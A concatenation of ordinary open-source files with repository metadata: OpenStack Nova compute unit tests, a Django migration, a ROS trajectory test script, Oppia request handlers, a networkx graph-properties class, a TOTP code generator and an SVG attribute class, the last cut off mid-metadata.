mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg(),
mox.IgnoreArg(), set_access_ip=False).AndRaise(exc)
self.mox.ReplayAll()
# test succeeds if mocked method '_reschedule_or_error' is not
# called.
self.compute._run_instance(self.context, None, {}, None, None, None,
False, None, self.instance, False)
def test_no_reschedule_on_unexpected_task_state(self):
# instance shouldn't be rescheduled if unexpected task state arises.
# the exception should get reraised.
self.mox.StubOutWithMock(self.compute, '_spawn')
self.mox.StubOutWithMock(self.compute, '_reschedule_or_error')
exc = exception.UnexpectedTaskStateError(expected=task_states.SPAWNING,
actual=task_states.SCHEDULING)
self.compute._spawn(mox.IgnoreArg(), self.instance, mox.IgnoreArg(),
mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg(),
mox.IgnoreArg(), set_access_ip=False).AndRaise(exc)
self.mox.ReplayAll()
self.assertRaises(exception.UnexpectedTaskStateError,
self.compute._run_instance, self.context, None, {}, None, None,
None, False, None, self.instance, False)
class ComputeRescheduleResizeOrReraiseTestCase(BaseTestCase):
"""Test logic and exception handling around rescheduling prep resize
requests
"""
def setUp(self):
super(ComputeRescheduleResizeOrReraiseTestCase, self).setUp()
self.instance = self._create_fake_instance()
self.instance_uuid = self.instance['uuid']
self.instance_type = flavors.get_flavor_by_name(
"m1.tiny")
def test_reschedule_resize_or_reraise_called(self):
"""Verify the rescheduling logic gets called when there is an error
during prep_resize.
"""
inst_obj = self._create_fake_instance_obj()
self.mox.StubOutWithMock(self.compute.db, 'migration_create')
self.mox.StubOutWithMock(self.compute, '_reschedule_resize_or_reraise')
self.compute.db.migration_create(mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(test.TestingException("Original"))
self.compute._reschedule_resize_or_reraise(mox.IgnoreArg(), None,
inst_obj, mox.IgnoreArg(), self.instance_type, None, None,
None)
self.mox.ReplayAll()
self.compute.prep_resize(self.context, image=None,
instance=inst_obj,
instance_type=self.instance_type)
def test_reschedule_fails_with_exception(self):
"""Original exception should be raised if the _reschedule method
raises another exception
"""
instance = self._create_fake_instance_obj()
method_args = (None, instance, self.instance_type, None, None,
None)
self.mox.StubOutWithMock(self.compute, "_reschedule")
self.compute._reschedule(
self.context, None, None, instance.uuid,
self.compute.scheduler_rpcapi.prep_resize, method_args,
task_states.RESIZE_PREP).AndRaise(
InnerTestingException("Inner"))
self.mox.ReplayAll()
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
self.assertRaises(test.TestingException,
self.compute._reschedule_resize_or_reraise, self.context,
None, instance, exc_info, self.instance_type, None,
{}, {})
def test_reschedule_false(self):
"""Original exception should be raised if the resize is not
rescheduled.
"""
instance = self._create_fake_instance_obj()
method_args = (None, instance, self.instance_type, None, None, None)
self.mox.StubOutWithMock(self.compute, "_reschedule")
self.compute._reschedule(
self.context, None, None, instance.uuid,
self.compute.scheduler_rpcapi.prep_resize, method_args,
task_states.RESIZE_PREP).AndReturn(False)
self.mox.ReplayAll()
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
self.assertRaises(test.TestingException,
self.compute._reschedule_resize_or_reraise, self.context,
None, instance, exc_info, self.instance_type, None,
{}, {})
def test_reschedule_true(self):
# If rescheduled, the original resize exception should be logged.
instance = self._create_fake_instance_obj()
instance_p = obj_base.obj_to_primitive(instance)
method_args = (instance_p, self.instance_type, None, {}, {}, None)
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
self.mox.StubOutWithMock(self.compute, "_reschedule")
self.mox.StubOutWithMock(self.compute, "_log_original_error")
self.compute._reschedule(self.context, {}, {},
instance.uuid,
self.compute.scheduler_rpcapi.prep_resize, method_args,
task_states.RESIZE_PREP, exc_info).AndReturn(True)
self.compute._log_original_error(exc_info, instance.uuid)
self.mox.ReplayAll()
self.compute._reschedule_resize_or_reraise(self.context, None,
instance, exc_info, self.instance_type, None, {}, {})
class ComputeInactiveImageTestCase(BaseTestCase):
def setUp(self):
super(ComputeInactiveImageTestCase, self).setUp()
def fake_show(meh, context, id):
return {'id': id, 'min_disk': None, 'min_ram': None,
'name': 'fake_name',
'status': 'deleted',
'properties': {'kernel_id': 'fake_kernel_id',
'ramdisk_id': 'fake_ramdisk_id',
'something_else': 'meow'}}
fake_image.stub_out_image_service(self.stubs)
self.stubs.Set(fake_image._FakeImageService, 'show', fake_show)
self.compute_api = compute.API()
def test_create_instance_with_deleted_image(self):
# Make sure we can't start an instance with a deleted image.
inst_type = flavors.get_flavor_by_name('m1.tiny')
self.assertRaises(exception.ImageNotActive,
self.compute_api.create,
self.context, inst_type, 'fake-image-uuid')
class EvacuateHostTestCase(BaseTestCase):
def setUp(self):
super(EvacuateHostTestCase, self).setUp()
self.inst_ref = jsonutils.to_primitive(self._create_fake_instance
({'host': 'fake_host_2',
'node': 'fakenode2'}))
db.instance_update(self.context, self.inst_ref['uuid'],
{"task_state": task_states.REBUILDING})
def tearDown(self):
db.instance_destroy(self.context, self.inst_ref['uuid'])
super(EvacuateHostTestCase, self).tearDown()
def _rebuild(self, on_shared_storage=True):
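# Drive the manager's rebuild_instance() with recreate=True, which is the
# code path the evacuate API ends up on; individual tests stub the driver
# and DB pieces they care about before calling this helper.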
def fake(cls, ctxt, instance, *args, **kwargs):
pass
self.stubs.Set(network_api.API, 'setup_networks_on_host', fake)
orig_image_ref = None
image_ref = None
injected_files = None
self.compute.rebuild_instance(
self.context, self.inst_ref, orig_image_ref, image_ref,
injected_files, 'newpass', recreate=True,
on_shared_storage=on_shared_storage)
def test_rebuild_on_host_updated_target(self):
"""Confirm evacuate scenario updates host and node."""
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
def fake_get_compute_info(context, host):
self.assertTrue(context.is_admin)
self.assertEquals('fake-mini', host)
return {'hypervisor_hostname': self.rt.nodename}
self.stubs.Set(self.compute, '_get_compute_info',
fake_get_compute_info)
self.mox.ReplayAll()
self._rebuild()
# Should be on destination host
instance = db.instance_get(self.context, self.inst_ref['id'])
self.assertEqual(instance['host'], self.compute.host)
self.assertEqual(NODENAME, instance['node'])
def test_rebuild_on_host_updated_target_node_not_found(self):
"""Confirm evacuate scenario where compute_node isn't found."""
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
def fake_get_compute_info(context, host):
raise exception.NotFound(_("Host %s not found") % host)
self.stubs.Set(self.compute, '_get_compute_info',
fake_get_compute_info)
self.mox.ReplayAll()
self._rebuild()
# Should be on destination host
instance = db.instance_get(self.context, self.inst_ref['id'])
self.assertEqual(instance['host'], self.compute.host)
self.assertIsNone(instance['node'])
def test_rebuild_with_instance_in_stopped_state(self):
"""Confirm evacuate scenario updates vm_state to stopped
if instance is in stopped state
"""
# Initialize the VM to stopped state
db.instance_update(self.context, self.inst_ref['uuid'],
{"vm_state": vm_states.STOPPED})
self.inst_ref['vm_state'] = vm_states.STOPPED
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
self.mox.ReplayAll()
self._rebuild()
# Check the vm state is reset to stopped
instance = db.instance_get(self.context, self.inst_ref['id'])
self.assertEqual(instance['vm_state'], vm_states.STOPPED)
def test_rebuild_with_wrong_shared_storage(self):
"""Confirm evacuate scenario does not update host."""
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
self.mox.ReplayAll()
self.assertRaises(exception.InvalidSharedStorage,
lambda: self._rebuild(on_shared_storage=False))
# Should remain on original host
instance = db.instance_get(self.context, self.inst_ref['id'])
self.assertEqual(instance['host'], 'fake_host_2')
def test_rebuild_on_host_with_volumes(self):
"""Confirm evacuate scenario reconnects volumes."""
values = {'instance_uuid': self.inst_ref['uuid'],
'source_type': 'volume',
'device_name': '/dev/vdc',
'delete_on_termination': False,
'volume_id': 'fake_volume_id'}
db.block_device_mapping_create(self.context, values)
def fake_volume_get(self, context, volume):
return {'id': 'fake_volume_id'}
self.stubs.Set(cinder.API, "get", fake_volume_get)
# Stub out and record whether it gets detached
result = {"detached": False}
def fake_detach(self, context, volume):
result["detached"] = volume["id"] == 'fake_volume_id'
self.stubs.Set(cinder.API, "detach", fake_detach)
def fake_terminate_connection(self, context, volume, connector):
return {}
self.stubs.Set(cinder.API, "terminate_connection",
fake_terminate_connection)
# make sure volumes attach, detach are called
self.mox.StubOutWithMock(self.compute.volume_api, 'detach')
self.compute.volume_api.detach(mox.IsA(self.context), mox.IgnoreArg())
self.mox.StubOutWithMock(self.compute, '_prep_block_device')
self.compute._prep_block_device(mox.IsA(self.context),
mox.IsA(self.inst_ref),
mox.IgnoreArg())
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
self.mox.ReplayAll()
self._rebuild()
# cleanup
for bdms in db.block_device_mapping_get_all_by_instance(
self.context, self.inst_ref['uuid']):
db.block_device_mapping_destroy(self.context, bdms['id'])
def test_rebuild_on_host_with_shared_storage(self):
"""Confirm evacuate scenario on shared storage."""
self.mox.StubOutWithMock(self.compute.driver, 'spawn')
self.compute.driver.spawn(mox.IsA(self.context),
mox.IsA(self.inst_ref), {}, mox.IgnoreArg(), 'newpass',
network_info=mox.IgnoreArg(),
block_device_info=mox.IgnoreArg())
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
self.mox.ReplayAll()
self._rebuild()
def test_rebuild_on_host_without_shared_storage(self):
"""Confirm evacuate scenario without shared storage
(rebuild from image)
"""
fake_image = {'id': 1,
'name': 'fake_name',
'properties': {'kernel_id': 'fake_kernel_id',
'ramdisk_id': 'fake_ramdisk_id'}}
self.mox.StubOutWithMock(self.compute.driver, 'spawn')
self.compute.driver.spawn(mox.IsA(self.context),
mox.IsA(self.inst_ref), mox.IsA(fake_image), mox.IgnoreArg(),
mox.IsA('newpass'), network_info=mox.IgnoreArg(),
block_device_info=mox.IgnoreArg())
self.stubs.Set(self.compute.driver, 'instance_on_disk',
lambda x: False)
self.mox.ReplayAll()
self._rebuild(on_shared_storage=False)
def test_rebuild_on_host_instance_exists(self):
"""Rebuild if instance exists raises an exception."""
db.instance_update(self.context, self.inst_ref['uuid'],
{"task_state": task_states.SCHEDULING})
self.compute.run_instance(self.context, instance=self.inst_ref)
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
self.assertRaises(exception.InstanceExists,
lambda: self._rebuild(on_shared_storage=True))
def test_driver_doesnt_support_recreate(self):
with utils.temporary_mutation(self.compute.driver.capabilities,
supports_recreate=False):
self.stubs.Set(self.compute.driver, 'instance_on_disk',
lambda x: True)
self.assertRaises(exception.InstanceRecreateNotSupported,
lambda: self._rebuild(on_shared_storage=True))
class ComputeInjectedFilesTestCase(BaseTestCase):
# Test that running instances with injected_files decodes files correctly
def setUp(self):
super(ComputeInjectedFilesTestCase, self).setUp()
self.instance = self._create_fake_instance()
self.stubs.Set(self.compute.driver, 'spawn', self._spawn)
def _spawn(self, context, instance, image_meta, injected_files,
admin_password, nw_info, block_device_info, db_api=None):
self.assertEqual(self.expected, injected_files)
def _test(self, injected_files, decoded_files):
self.expected = decoded_files
self.compute.run_instance(self.context, self.instance,
injected_files=injected_files)
def test_injected_none(self):
# test an input of None for injected_files
self._test(None, [])
def test_injected_empty(self):
# test an input of [] for injected_files
self._test([], [])
def test_injected_success(self):
# test with valid b64 encoded content.
injected_files = [
('/a/b/c', base64.b64encode('foobarbaz')),
('/d/e/f', base64.b64encode('seespotrun')),
]
decoded_files = [
('/a/b/c', 'foobarbaz'),
('/d/e/f', 'seespotrun'),
]
self._test(injected_files, decoded_files)
def test_injected_invalid(self):
# test with invalid b64 encoded content
injected_files = [
('/a/b/c', base64.b64encode('foobarbaz')),
('/d/e/f', 'seespotrun'),
]
self.assertRaises(exception.Base64Exception, self.compute.run_instance,
self.context, self.instance, injected_files=injected_files)
def test_reschedule(self):
# test that rescheduling is done with original encoded files
expected = [
('/a/b/c', base64.b64encode('foobarbaz')),
('/d/e/f', base64.b64encode('seespotrun')),
]
def _roe(context, instance, exc_info, requested_networks,
admin_password, injected_files, is_first_time, request_spec,
filter_properties, bdms=None, legacy_bdm_in_spec=False):
self.assertEqual(expected, injected_files)
return True
def spawn_explode(context, instance, image_meta, injected_files,
admin_password, nw_info, block_device_info):
# force reschedule logic to execute
raise test.TestingException(_("spawn error"))
self.stubs.Set(self.compute.driver, 'spawn', spawn_explode)
self.stubs.Set(self.compute, '_reschedule_or_error', _roe)
self.compute.run_instance(self.context, self.instance,
injected_files=expected)
class CheckConfigDriveTestCase(test.TestCase):
    # NOTE(sirp): `TestCase` is far too heavyweight for this test; it should
# probably derive from a `test.FastTestCase` that omits DB and env
# handling
def setUp(self):
super(CheckConfigDriveTestCase, self).setUp()
self.compute_api = compute.API()
def _assertCheck(self, expected, config_drive):
self.assertEqual(expected,
self.compute_api._check_config_drive(config_drive))
def _assertInvalid(self, config_drive):
self.assertRaises(exception.ConfigDriveInvalidValue,
self.compute_api._check_config_drive,
config_drive)
def test_config_drive_false_values(self):
self._assertCheck('', None)
self._assertCheck('', '')
self._assertCheck('', 'False')
self._assertCheck('', 'f')
self._assertCheck('', '0')
def test_config_drive_true_values(self):
self._assertCheck(True, 'True')
self._assertCheck(True, 't')
self._assertCheck(True, '1')
def test_config_drive_bogus_values_raise(self):
self._assertInvalid('asd')
self._assertInvalid(uuidutils.generate_uuid())
class CheckRequestedImageTestCase(test.TestCase):
def setUp(self):
super(CheckRequestedImageTestCase, self).setUp()
self.compute_api = compute.API()
self.context = context.RequestContext(
'fake_user_id', 'fake_project_id')
self.instance_type = flavors.get_default_flavor()
self.instance_type['memory_mb'] = 64
self.instance_type['root_gb'] = 1
def test_no_image_specified(self):
self.compute_api._check_requested_image(self.context, None, {},
self.instance_type)
def test_image_status_must_be_active(self):
image = dict(id='123', status='foo')
self.assertRaises(exception.ImageNotActive,
self.compute_api._check_requested_image, self.context,
image['id'], image, self.instance_type)
image['status'] = 'active'
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
def test_image_min_ram_check(self):
image = dict(id='123', status='active', min_ram='65')
self.assertRaises(exception.InstanceTypeMemoryTooSmall,
self.compute_api._check_requested_image, self.context,
image['id'], image, self.instance_type)
image['min_ram'] = '64'
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
def test_image_min_disk_check(self):
image = dict(id='123', status='active', min_disk='2')
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api._check_requested_image, self.context,
image['id'], image, self.instance_type)
image['min_disk'] = '1'
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
def test_image_too_large(self):
image = dict(id='123', status='active', size='1073741825')
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api._check_requested_image, self.context,
image['id'], image, self.instance_type)
image['size'] = '1073741824'
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
def test_root_gb_zero_disables_size_check(self):
self.instance_type['root_gb'] = 0
image = dict(id='123', status='active', size='1073741825')
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
def test_root_gb_zero_disables_min_disk(self):
self.instance_type['root_gb'] = 0
image = dict(id='123', status='active', min_disk='2')
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
| {
"content_hash": "4342ea672479a941fcde98281bf11d16",
"timestamp": "",
"source": "github",
"line_count": 9496,
"max_line_length": 79,
"avg_line_length": 43.652801179443976,
"alnum_prop": 0.575996255973676,
"repo_name": "ntt-sic/nova",
"id": "a16f8c19ee1b1d00e136c70b9c74ed4add4e5027",
"size": "415380",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/tests/compute/test_compute.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13403264"
},
{
"name": "Shell",
"bytes": "17194"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bio', models.CharField(blank=True, max_length=500, null=True)),
('website', models.CharField(blank=True, max_length=255, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL)),
],
),
]
| {
"content_hash": "c195f84ac98df5a1aab7dcb46e523f61",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 145,
"avg_line_length": 33.46153846153846,
"alnum_prop": 0.6333333333333333,
"repo_name": "julienawilson/news-project",
"id": "b894e9a1b1dc72210b1708b103abe2bae64b8634",
"size": "943",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "news_project/profiles/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "8482"
},
{
"name": "Python",
"bytes": "19006"
}
],
"symlink_target": ""
} |
import time
import roslib;
import rospy
import actionlib
from control_msgs.msg import *
from trajectory_msgs.msg import *
JOINT_NAMES = ['front_left_wheel_joint', 'back_left_wheel_joint', 'back_right_wheel_joint', 'front_right_wheel_joint']
Q1_ANGLE = 1.5708
Q0 = [0, 0, 0, 0]
Q1 = [Q1_ANGLE, Q1_ANGLE, Q1_ANGLE, Q1_ANGLE]
client = None
def move1():
g = FollowJointTrajectoryGoal()
g.trajectory = JointTrajectory()
g.trajectory.joint_names = JOINT_NAMES
print JOINT_NAMES
g.trajectory.points = [
JointTrajectoryPoint(positions=Q0, time_from_start=rospy.Duration(1.0)),
JointTrajectoryPoint(positions=Q1, time_from_start=rospy.Duration(2.0)),
JointTrajectoryPoint(positions=Q0, time_from_start=rospy.Duration(3.0))]
client.send_goal(g)
try:
client.wait_for_result()
except KeyboardInterrupt:
client.cancel_goal()
raise
def main():
global client
try:
rospy.init_node("test_move", anonymous=True, disable_signals=True)
client = actionlib.SimpleActionClient('follow_joint_trajectory', FollowJointTrajectoryAction)
print "Waiting for server..."
client.wait_for_server()
print "Connected to server"
move1()
except KeyboardInterrupt:
rospy.signal_shutdown("KeyboardInterrupt")
raise
if __name__ == '__main__': main()
| {
"content_hash": "697aab04c72c0510733768c9c23dd75e",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 118,
"avg_line_length": 29.145833333333332,
"alnum_prop": 0.6604717655468192,
"repo_name": "arennuit/vrep_ros_control_example",
"id": "cd00e2dad20d1ac777c8dc16419bdeefb61c00d0",
"size": "1421",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "action/test_move.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "58129"
},
{
"name": "C++",
"bytes": "223759"
},
{
"name": "Python",
"bytes": "1421"
}
],
"symlink_target": ""
} |
"""Oppia base constants and handlers."""
__author__ = 'Sean Lip'
import json
import logging
import sys
import traceback
import feconf
import jinja2
from models.exploration import Exploration
from models.state import State
import webapp2
from google.appengine.api import users
def require_user(handler):
"""Decorator that checks if a user is associated to the current session."""
def test_login(self, **kwargs):
"""Checks if the user for the current session is logged in."""
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url(self.request.uri))
return
return handler(self, user, **kwargs)
return test_login
def require_editor(handler):
"""Decorator that checks if the user can edit the given entity."""
def test_editor(self, exploration_id, state_id=None, **kwargs):
"""Gets the user and exploration id if the user can edit it.
Args:
self: the handler instance
exploration_id: the exploration id
state_id: the state id, if it exists
**kwargs: any other arguments passed to the handler
Returns:
The user and exploration instance, if the user is authorized to edit
this exploration. Also, the state instance, if one is supplied.
Raises:
self.NotLoggedInException: if there is no current user.
self.UnauthorizedUserException: if the user exists but does not have
the right credentials.
"""
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url(self.request.uri))
return
exploration = Exploration.get(exploration_id)
if not exploration.is_editable_by(user):
raise self.UnauthorizedUserException(
'%s does not have the credentials to edit this exploration.',
user)
if not state_id:
return handler(self, user, exploration, **kwargs)
state = State.get(state_id, exploration)
return handler(self, user, exploration, state, **kwargs)
return test_editor
def require_admin(handler):
"""Decorator that checks if the current user is an admin."""
def test_admin(self, **kwargs):
"""Checks if the user is logged in and is an admin."""
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url(self.request.uri))
return
if not users.is_current_user_admin():
raise self.UnauthorizedUserException(
'%s is not an admin of this application', user)
return handler(self, user, **kwargs)
return test_admin
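# Illustrative sketch (not part of the original module): how a handler
# method would typically be protected by one of the decorators above. The
# class name and template are hypothetical.
#
#     class AdminPage(BaseHandler):
#         @require_admin
#         def get(self, user):
#             self.values['nickname'] = user.nickname()
#             self.render_template('admin_page.html')
#
# The decorator redirects anonymous visitors to the login page and passes
# the authenticated user object to the wrapped method as its first
# argument after self.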
class BaseHandler(webapp2.RequestHandler):
"""Base class for all Oppia handlers."""
@webapp2.cached_property
def jinja2_env(self):
return jinja2.Environment(
autoescape=True,
loader=jinja2.FileSystemLoader(feconf.TEMPLATE_DIR))
def __init__(self, request, response):
# Set self.request, self.response and self.app.
self.initialize(request, response)
# Initializes the return dict for the handlers.
self.values = {
'debug': feconf.DEBUG,
'allow_yaml_file_upload': feconf.ALLOW_YAML_FILE_UPLOAD,
}
user = users.get_current_user()
if user:
self.values['logout_url'] = (
users.create_logout_url(self.request.uri))
self.values['user'] = user.nickname()
self.values['is_admin'] = users.is_current_user_admin()
else:
self.values['login_url'] = users.create_login_url(self.request.uri)
def render_template(self, filename, values=None):
if values is None:
values = self.values
self.response.cache_control.no_cache = True
self.response.cache_control.must_revalidate = True
self.response.expires = 'Mon, 01 Jan 1990 00:00:00 GMT'
self.response.pragma = 'no-cache'
self.response.write(self.jinja2_env.get_template(
filename).render(**values))
def _render_exception(self, error_code, values):
assert error_code in [400, 401, 500]
values['code'] = error_code
# This checks if the response should be JSON or HTML.
if self.request.get('payload'):
self.response.write(json.dumps(values))
else:
self.values.update(values)
self.render_template('error.html')
def handle_exception(self, exception, debug_mode):
"""Overwrites the default exception handler."""
logging.info(''.join(traceback.format_exception(*sys.exc_info())))
logging.error('Exception raised: %s', exception)
if isinstance(exception, self.NotLoggedInException):
self.redirect(users.create_login_url(self.request.uri))
return
if isinstance(exception, self.UnauthorizedUserException):
self.error(401)
self._render_exception(401, {'error': str(exception)})
return
if isinstance(exception, self.InvalidInputException):
self.error(400)
self._render_exception(400, {'error': str(exception)})
return
if isinstance(exception, self.InternalErrorException):
self.error(500)
self._render_exception(500, {'error': str(exception)})
return
self.error(500)
self._render_exception(500, {'error': str(exception)})
class UnauthorizedUserException(Exception):
"""Error class for unauthorized access."""
class NotLoggedInException(Exception):
"""Error class for users that are not logged in (error code 401)."""
class InvalidInputException(Exception):
"""Error class for invalid input on the user's side (error code 400)."""
class InternalErrorException(Exception):
"""Error class for an internal server side error (error code 500)."""
| {
"content_hash": "dfa565fd5e4b0b68c12e20439609c01e",
"timestamp": "",
"source": "github",
"line_count": 175,
"max_line_length": 80,
"avg_line_length": 34.565714285714286,
"alnum_prop": 0.625227310299223,
"repo_name": "sunu/oppia-test",
"id": "1a9f00c1cfd4f60bf6de1ce1fa5d170f4b3c995b",
"size": "6647",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "controllers/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "7292"
},
{
"name": "JavaScript",
"bytes": "5995930"
},
{
"name": "Python",
"bytes": "202930"
},
{
"name": "Shell",
"bytes": "16798"
}
],
"symlink_target": ""
} |
import networkx as nx
import operator
class Properties:
"""
Some important properties of the graph.
Arguments:
graph - A networkx graph or digraph.
"""
def __init__(self, graph):
self.g = graph
def ConnectedComponents(self):
"""
Compute the connected components of the graph.
Returns:
        a list of subgraphs, one for each connected component.
"""
gr = self.g
conn_comps = nx.connected_component_subgraphs(gr, copy=True)
return list(conn_comps)
def nodeInConnectedComponent(self, node):
"""
Place a node in a connected component of the graph.
Arguments:
node - the node whose connected component is desired.
Returns:
A connected subgraph of the original graph which contains the node.
"""
gr = self.g
        neighboringNodes = nx.node_connected_component(gr, node)
        subgraph = nx.subgraph(gr, neighboringNodes)
return subgraph
def centralNodes(self, nNodes, closeness=False, betweenness=False):
"""
        Compute the most central nodes. Centrality measures how important/central a node is in the graph.
We have three metrics for measuring centrality ---
Degree Centrality : The degree centrality for a node v is the fraction of nodes it is connected to.
This is the default measure.
Closeness Centrality : Closeness centrality of a node u is the reciprocal of the sum of the
shortest path distances from u to all n−1 other nodes.
(http://en.wikipedia.org/wiki/Centrality#Closeness_centrality)
Betweenness Centrality : Betweenness centrality of a node v is the sum of the fraction of all-pairs
shortest paths that pass through v.
(http://en.wikipedia.org/wiki/Betweenness_centrality)
Arguments:
nNodes - number of most central nodes to be retrieved.
closeness : If True, the closeness centrality is evaluated.
betweenness : If True, the betweenness centrality is evaluated.
Returns:
A list of most central nodes.
"""
gr = self.g
        if closeness:
            centralityDict = nx.closeness_centrality(gr)
        elif betweenness:
            centralityDict = nx.betweenness_centrality(gr)
        else:
            centralityDict = nx.degree_centrality(gr)
sortedCentralityDict = sorted(centralityDict.iteritems(), key=operator.itemgetter(1), reverse=True)
central_nodes = []
i = 0
while (i < nNodes):
u,v = sortedCentralityDict[i]
central_nodes.append(u)
i += 1
return central_nodes
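# Illustrative usage sketch (not part of the original module). It assumes
# the environment this class was written for (Python 2 / networkx 1.x,
# since the methods above rely on dict.iteritems and
# nx.connected_component_subgraphs).
if __name__ == '__main__':
    g = nx.Graph()
    g.add_edges_from([('a', 'b'), ('b', 'c'), ('c', 'a'), ('d', 'e')])
    props = Properties(g)
    print(len(props.ConnectedComponents()))              # 2 components
    print(props.nodeInConnectedComponent('d').nodes())   # nodes 'd' and 'e'
    print(props.centralNodes(2))                          # two highest-degree nodes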
| {
"content_hash": "1715c9ad44a32eccdb1ca807e354cce9",
"timestamp": "",
"source": "github",
"line_count": 114,
"max_line_length": 102,
"avg_line_length": 21.62280701754386,
"alnum_prop": 0.7022312373225152,
"repo_name": "Jverma/TextGraphics",
"id": "2ee74f9c8fd36143539f79e39a3f344681d41d95",
"size": "2596",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "TextGraphics/Analysis/properties.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24497"
}
],
"symlink_target": ""
} |
import hmac, base64, struct, hashlib, time, json, os
def get_hotp_token(secret, intervals_no):
"""This is where the magic happens."""
key = base64.b32decode(normalize(secret), True) # True is to fold lower into uppercase
msg = struct.pack(">Q", intervals_no)
h = bytearray(hmac.new(key, msg, hashlib.sha1).digest())
o = h[19] & 15
h = str((struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000)
return prefix0(h)
def get_totp_token(secret):
"""The TOTP token is just a HOTP token seeded with every 30 seconds."""
return get_hotp_token(secret, intervals_no=int(time.time())//30)
def normalize(key):
"""Normalizes secret by removing spaces and padding with = to a multiple of 8"""
k2 = key.strip().replace(' ','')
# k2 = k2.upper() # skipped b/c b32decode has a foldcase argument
if len(k2)%8 != 0:
k2 += '='*(8-len(k2)%8)
return k2
def prefix0(h):
"""Prefixes code with leading zeros if missing."""
if len(h) < 6:
h = '0'*(6-len(h)) + h
return h
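def _demo():
    """Illustrative usage sketch, not part of the original script.
    The secret below is a made-up base32 example, not a real key.
    """
    example_secret = 'JBSWY3DPEHPK3PXP'
    interval = int(time.time()) // 30  # same 30-second window used by get_totp_token
    print("HOTP for this interval: {}".format(get_hotp_token(example_secret, interval)))
    print("TOTP (equivalent call): {}".format(get_totp_token(example_secret)))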
def main():
rel = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
with open(os.path.join(rel,'secrets.json'), 'r') as f:
secrets = json.load(f)
for label, key in sorted(list(secrets.items())):
print("{}:\t{}".format(label, get_totp_token(key)))
if __name__ == "__main__":
main()
| {
"content_hash": "f052282c3f72f0532ebefd8e58d304a4",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 87,
"avg_line_length": 30.069767441860463,
"alnum_prop": 0.6465583913379737,
"repo_name": "grahammitchell/google-authenticator",
"id": "69139b2ee50b7e492a3520ffe99369e29420d5a7",
"size": "1312",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "google-authenticator.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1312"
}
],
"symlink_target": ""
} |
from RGT.XML.SVG.Attribs.basicSvgAttribute import BasicSvgAttribute
from types import StringType
class PositionAttributes(BasicSvgAttribute):
ATTRIBUTE_X = 'x'
ATTRIBUTE_Y = 'y'
def __init__(self):
BasicSvgAttribute.__init__(self)
def setX(self, data):
if data is not None:
if type(data) is not StringType:
data = str(data)
self._setNodeAttribute(self.ATTRIBUTE_X, data)
def setY(self, data):
if data is not None:
if type(data) is not StringType:
data = str(data)
self._setNodeAttribute(self.ATTRIBUTE_Y, data)
def getX(self):
node = self._getNodeAttribute(self.ATTRIBUTE_X)
if node is not None:
return node.nodeValue
return None
def getY(self):
node = self._getNodeAttribute(self.ATTRIBUTE_Y)
if node is not None:
return node.nodeValue
return None
| {
"content_hash": "74d44687e1029e985fcc223f814d51b7",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 67,
"avg_line_length": 27.405405405405407,
"alnum_prop": 0.5690335305719921,
"repo_name": "danrg/RGT-tool",
"id": "67dd94524bb51570e767ee519d1133811c4030c2",
"size": "1014",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/RGT/XML/SVG/Attribs/positionAttributes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "83200"
},
{
"name": "HTML",
"bytes": "93970"
},
{
"name": "JavaScript",
"bytes": "111380"
},
{
"name": "Python",
"bytes": "788710"
},
{
"name": "SQLPL",
